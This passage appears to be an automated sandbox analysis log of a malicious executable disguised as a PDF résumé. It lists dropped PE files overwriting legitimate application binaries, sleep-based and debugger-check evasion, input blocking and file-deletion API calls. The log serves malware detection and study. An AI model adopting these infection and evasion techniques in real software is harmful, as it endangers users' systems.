            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | API coverage: 4.4 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe TID: 7740 | Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 7788 | Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\System32\msdtc.exe TID: 7328 | Thread sleep count: 490 > 30
            Source: C:\Windows\System32\msdtc.exe TID: 7328 | Thread sleep time: -49000s >= -30000s
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 4384 | Thread sleep count: 9681 > 30
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 4384 | Thread sleep time: -96810000s >= -30000s
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 4384 | Thread sleep count: 317 > 30
            Source: C:\Windows\SysWOW64\perfhost.exe TID: 4384 | Thread sleep time: -3170000s >= -30000s
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 8596 | Thread sleep count: 5081 > 30
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 8596 | Thread sleep time: -10162000s >= -30000s
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 8596 | Thread sleep count: 4890 > 30
            Source: C:\Windows\SysWOW64\mfpmp.exe TID: 8596 | Thread sleep time: -9780000s >= -30000s
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe TID: 8708 | Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\perfhost.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\mfpmp.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_0046C6D1 FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\mfpmp.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03A7096E rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00417D83 LdrLoadDll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_00473F09 BlockInput
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
